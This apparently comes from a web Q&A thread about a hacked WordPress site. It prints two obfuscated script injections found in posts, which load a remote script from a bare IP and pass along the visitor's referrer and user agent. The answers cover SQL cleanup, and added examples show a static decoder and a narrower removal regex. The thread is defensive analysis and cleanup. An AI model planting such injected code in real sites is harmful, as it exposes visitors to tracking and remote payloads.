Here is an example of code I have seen inserted in two different posts:

<noindex><script id="wpinfo-pst1" type="text/javascript" rel="nofollow">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("<a g=\'2\' c=\'d\' e=\'b/2\' 4=\'7://5.8.9.f/1/h.s.t?r="+3(0.p)+"\\o="+3(j.i)+"\'><\\/k"+"l>");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hkfkr|var|u0026u|referrer|fdrht||js|php'.split('|'),0,{}))
</script></noindex>

Second Example:

<noindex><script id="wpinfo-pst1" type="text/javascript" rel="nofollow">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("<a g=\'2\' c=\'d\' e=\'b/2\' 4=\'7://5.8.9.f/1/h.s.t?r="+3(0.p)+"\o="+3(j.i)+"\'><\/k"+"l>");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kzfke|var|u0026u|referrer|dabzy||js|php'.split('|'),0,{}))
</script></noindex>

What would a hacker get out of this?

How can I do a mass-replace? Can I do a regex in MySQL and update the WP-Posts directly? Seems like just a few letters are different on each one.

asked Apr 12, 2019 at 21:34 by NealWalters
  • Are you investigating this just for learning purposes? Or do you need help cleaning up an infected site? It's two questions in one thread. – user3135691 Commented Apr 12, 2019 at 22:25

3 Answers

As I was using MariaDB, the following update did the fix:

update wp_posts set post_content = REGEXP_REPLACE(post_content,'(*CRLF)<noindex>.*</noindex> ','')

See https://dba.stackexchange.com/questions/234774/mariadb-multiline-regex/234778#234778
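Added example, not part of the answer above or of the original thread: a removal pattern can be checked offline on exported post content before any UPDATE is run. The pattern here is tied to the `wpinfo-pst1` script id and uses a lazy quantifier, and is compared with a greedy `<noindex>…</noindex>` match that crosses line breaks; the function names and sample posts are assumptions constructed for illustration.

```javascript
// Added example: check a removal pattern on exported post content before
// touching the database. Sample posts are constructed.

// Tied to the injected script's id; [\s\S]*? is lazy, so each match ends at the
// first closing </script></noindex> after it.
const INJECTED =
  /<noindex>\s*<script\b[^>]*\bid="wpinfo-pst1"[^>]*>[\s\S]*?<\/script>\s*<\/noindex>/g;

// For comparison: greedy "<noindex>.*</noindex>" with the dot crossing line breaks.
const GREEDY = /<noindex>[\s\S]*<\/noindex>/g;

// Hypothetical helper: strip injected blocks and report how many were removed.
function cleanPost(content) {
  const hits = content.match(INJECTED) || [];
  return { cleaned: content.replace(INJECTED, ''), removed: hits.length };
}

// Constructed stand-in with the same wrapper tags and id as the posted samples.
const inj = (tag) =>
  `<noindex><script id="wpinfo-pst1" type="text/javascript" rel="nofollow">eval("${tag}")\n</script></noindex>`;

const POST = [
  'Intro paragraph.',
  inj('one'),
  'Middle paragraph.',
  inj('two'),
  '<noindex>Author note that belongs to the post.</noindex>',
].join('\n');

const result = cleanPost(POST);
console.log(result.removed, JSON.stringify(result.cleaned));
console.log(JSON.stringify(POST.replace(GREEDY, '')));
```

On the constructed post, the id-anchored pattern removes the two injected blocks and keeps the text between them, while the greedy pattern deletes everything from the first `<noindex>` to the last `</noindex>`.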

I'm sorry to see your site has malicious code in it. Unfortunately, helping to fix compromised sites is outside the scope of this community.

I can answer your first question, though. This code appears to be garbled, but it is redirecting traffic from your site to some IP address with a path. I can't say exactly why, but this is usually to generate referral traffic, generate cryptocurrency, or compromise browsers in an effort to glean valuable personal information.

It's dangerous to your visitors to leave this code on your site.
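Added example, not part of the answers or of the original thread: the injected script uses the "p,a,c,k,e,d" packer form, which can be decoded as data without running it. The decoder below handles the simple variant seen in the question (token = dictionary index, radix at most 36); the function names and the sample input are assumptions constructed for illustration, with a placeholder host.

```javascript
// Added example: static decoder for the simple "p,a,c,k,e,d" packer form, where each
// token is a dictionary index written in base `radix` (<= 36). It never calls eval().

// Constructed sample in the packed shape; dictionary and host are placeholders.
const SAMPLE = String.raw`eval(function(p,a,c,k,e,d){/* unpacker body omitted */}('0.2("<3 4=\'5://6.7/8.9?r="+a(0.b)+"\'><\\/3>");',12,12,'document||write|script|src|http|example|invalid|x|js|encodeURI|referrer'.split('|'),0,{}))`;

// Pull the packer arguments out of the source text as plain strings.
function parsePacked(source) {
  const m = /\}\('((?:\\.|[^'\\])*)',(\d+),(\d+),'((?:\\.|[^'\\])*)'\.split\('\|'\)/.exec(source);
  if (!m) return null;
  // Undo \' and \\ from the single-quoted literals; other escapes are left as written.
  const unquote = (s) => s.replace(/\\(['\\])/g, '$1');
  return { payload: unquote(m[1]), radix: Number(m[2]), count: Number(m[3]),
           words: unquote(m[4]).split('|') };
}

// Swap each token for its dictionary word; an empty slot means the token stands for itself.
function unpack(source) {
  const p = parsePacked(source);
  if (!p || p.radix < 2 || p.radix > 36) return null; // not the variant handled here
  return p.payload.replace(/\b\w+\b/g, (tok) => {
    const idx = parseInt(tok, p.radix);
    const isToken = idx < p.count && idx.toString(p.radix) === tok;
    return isToken && p.words[idx] ? p.words[idx] : tok;
  });
}

// Triage helper: URLs that appear in the decoded code.
function extractUrls(code) {
  return code.match(/https?:\/\/[^\s'"<>]+/g) || [];
}

const decoded = unpack(SAMPLE);
console.log(decoded);
console.log(extractUrls(decoded));
```

Applied to the two samples in the question, the decoded text is a `document.write` of a `<script>` tag whose `src` is a `jquery.js.php` path on a bare IP address, with the visitor's referrer and user agent appended as query parameters. The only difference between the two samples is a throwaway variable name and value.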

There is lots of info on the googles (or bings, or ducks) about how to clean up a site. And it is true that your question is out of scope for this place.

But, it is something that is asked often. Code that you don't recognize is probably dangerous to your site and your visitors. (Like the code that was inside the "Yellow Pencil" theme, and other themes/plugins that have been compromised.)

So, cleaning is important. And it can be done, although it is a bit of work (I've done it for clients).

See my (accepted) answer here on my recommendations: "Is this a hacking script in function.php?". If it was my site (or one that I manage), that's the procedure I would use to clean up a site.

Article tags: hacked; Why would a hacker add this code to each post and how to do mass cleanup